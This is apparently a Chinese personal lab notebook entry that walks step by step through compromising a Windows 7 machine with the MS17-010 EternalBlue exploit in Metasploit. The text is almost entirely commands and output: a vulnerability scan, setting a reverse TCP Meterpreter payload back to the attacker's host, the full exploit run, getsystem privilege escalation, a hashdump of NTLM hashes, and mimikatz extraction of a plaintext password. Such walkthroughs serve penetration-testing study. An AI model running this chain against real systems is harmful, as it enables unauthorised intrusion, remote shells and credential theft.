主要是方便自己之后忘了,而写的,大佬绕过,大佬绕过,大佬绕过,重要的说三遍。哈哈
***机:
IP地址:192.168.10.15
系统:kali linux
靶机:
IP地址:192.168.10.13
系统:win7
启动metasploit-framework
~# msfconsole
查找需要用到的***模块:
msf > search ms17-010
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/smb/ms17_010_command 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
auxiliary/scanner/smb/smb_ms17_010 normal MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
exploit/windows/smb/ms17_010_psexec 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
先用辅助模块auxiliary/scanner/smb/smb_ms17_010,检测目标系统是否存在这个漏洞
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > options 查看需要设置那些参数,看required,如果下面是yes就必须设置
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
msf auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.10.13 ####大部分参数已经默认,只需要设置rhosts即可
rhosts => 192.168.10.13
msf auxiliary(scanner/smb/smb_ms17_010) > run ###执行 可以看到返回可能存在ms17-010漏洞
[+] 192.168.10.13:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
使用exploit模块:
msf auxiliary(scanner/smb/smb_ms17_010) > back 返回上层用back,不用也可以直接选择另一个模块,只是说一下
msf >
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > options ###查看需要设置参数
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST yes The target address
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VerifyArch true yes Check if remote architecture matches exploit Target.
VerifyTarget true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.10.13 #####设置靶机ip
RHOST => 192.168.10.13
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp ###设置payload如果是32位系统就用windows/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST 192.168.10.13 yes The target address
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VerifyArch true yes Check if remote architecture matches exploit Target.
VerifyTarget true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.10.15 ####设置本地主机
lhost => 192.168.10.15
msf exploit(windows/smb/ms17_010_eternalblue) > run ####执行
[*] Started reverse TCP handler on 192.168.10.15:4444
[*] 192.168.10.13:445 - Connecting to target for exploitation.
[+] 192.168.10.13:445 - Connection established for exploitation.
[+] 192.168.10.13:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.10.13:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.10.13:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.10.13:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.10.13:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.10.13:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.10.13:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.10.13:445 - Sending all but last fragment of exploit packet
[*] 192.168.10.13:445 - Starting non-paged pool grooming
[+] 192.168.10.13:445 - Sending SMBv2 buffers
[+] 192.168.10.13:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.10.13:445 - Sending final SMBv2 buffers.
[*] 192.168.10.13:445 - Sending last fragment of exploit packet!
[*] 192.168.10.13:445 - Receiving response from exploit packet
[+] 192.168.10.13:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.10.13:445 - Sending egg to corrupted connection.
[*] 192.168.10.13:445 - Triggering free of corrupted buffer.
[-] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 中间可能会失败,耐心点。
[-] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.10.13:445 - Connecting to target for exploitation.
[+] 192.168.10.13:445 - Connection established for exploitation.
[+] 192.168.10.13:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.10.13:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.10.13:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.10.13:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.10.13:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.10.13:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.10.13:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.10.13:445 - Sending all but last fragment of exploit packet
[*] 192.168.10.13:445 - Starting non-paged pool grooming
[+] 192.168.10.13:445 - Sending SMBv2 buffers
[+] 192.168.10.13:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.10.13:445 - Sending final SMBv2 buffers.
[*] 192.168.10.13:445 - Sending last fragment of exploit packet!
[*] 192.168.10.13:445 - Receiving response from exploit packet
[+] 192.168.10.13:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.10.13:445 - Sending egg to corrupted connection.
[*] 192.168.10.13:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.10.13
[*] Meterpreter session 1 opened (192.168.10.15:4444 -> 192.168.10.13:49341) at 2018-05-13 10:17:45 +0800
[+] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > 拿到一个反弹的meterpreter
***后的提权:
meterpreter > sysinfo 查看系统后的信息
Computer : INI-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getsystem ===》####用这个提权比较顺利,有时候这个提权可能提权不了,还可以通过绕过UAC进行提权,可以参考:http://netsecurity.51cto.com/art/201612/524691.htm
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
抓取用户的密码:
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:9f22bada0de76a5744d444632dafa2a7:::
ini:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
meterpreter > load mimikatz 加载密码提取神器,哈哈
Loading extension mimikatz...Success.
meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;996 Negotiate WORKGROUP INI-PC$
0;47944 NTLM
0;999 NTLM WORKGROUP INI-PC$
0;114022 NTLM ini-PC ini 123456
0;113976 NTLM ini-PC ini 123456 ###得到用户的密码